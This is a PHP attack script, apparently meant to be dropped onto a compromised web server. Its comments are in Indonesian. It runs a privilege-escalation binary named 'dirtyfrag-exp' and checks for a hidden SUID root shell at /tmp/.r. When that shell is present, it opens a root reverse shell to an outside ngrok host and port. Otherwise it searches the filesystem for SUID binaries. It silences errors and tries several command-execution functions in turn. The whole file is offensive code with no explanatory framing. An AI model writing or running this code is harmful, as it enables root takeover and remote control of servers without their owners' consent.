| <?php
|
| set_time_limit(0);
|
| error_reporting(0);
|
| header('Content-Type: text/plain');
|
|
|
| $ip = '0.tcp.ap.ngrok.io';
|
| $port = 13939;
|
|
|
| function exe($c) {
|
| if(function_exists('system')){ @ob_start(); @system($c.' 2>&1'); $o=@ob_get_contents(); @ob_end_clean(); return $o; }
|
| if(function_exists('exec')){ @exec($c.' 2>&1',$r); return implode("\n",$r); }
|
| if(function_exists('shell_exec')){ return @shell_exec($c.' 2>&1'); }
|
| return "?";
|
| }
|
|
|
| // Step 1: chmod
|
| echo "[*] chmod +x dirtyfrag-exp...\n";
|
| echo exe('chmod +x dirtyfrag-exp 2>&1');
|
|
|
| // Step 2: eksekusi
|
| echo "\n[*] ./dirtyfrag-exp...\n";
|
| echo exe('./dirtyfrag-exp 2>&1');
|
|
|
| // Step 3: cek SUID shell
|
| echo "\n[*] Cek /tmp/.r...\n";
|
| echo exe('ls -la /tmp/.r 2>&1');
|
|
|
| // Step 4: cek apakah SUID shell ada
|
| if(file_exists('/tmp/.r') || exe('ls /tmp/.r 2>/dev/null')) {
|
| echo "\n[+] SUID SHELL ADA! Spawning root...\n";
|
| echo exe('/tmp/.r -c "id 2>&1"');
|
|
|
| // Reverse shell root
|
| $s = @fsockopen($ip, $port, $e, $r, 5);
|
| if($s) {
|
| $ds = array(0=>array('pipe','r'),1=>array('pipe','w'),2=>array('pipe','w'));
|
| $p = @proc_open('/tmp/.r -i 2>&1', $ds, $pp);
|
| if(is_resource($p)) {
|
| fwrite($s, "[ROOT] uid=" . exe('/tmp/.r -c "id"') . "\n\n");
|
| stream_set_blocking($pp[0],0); stream_set_blocking($pp[1],0); stream_set_blocking($s,0);
|
| while(!feof($s)) {
|
| @fwrite($pp[0], @fread($s, 8192));
|
| @fwrite($s, @fread($pp[1], 8192));
|
| }
|
| }
|
| fclose($s);
|
| }
|
| } else {
|
| echo "\n[-] SUID shell tidak ada, cek manual...\n";
|
| echo exe('find /tmp -perm -4000 -type f 2>/dev/null');
|
| echo exe('find / -name ".rootshell" -type f 2>/dev/null');
|
| echo exe('find / -perm -4000 -user root -type f 2>/dev/null | head -10');
|
| }
|
|
|
| echo "\n[DONE]";
|
| ?>
|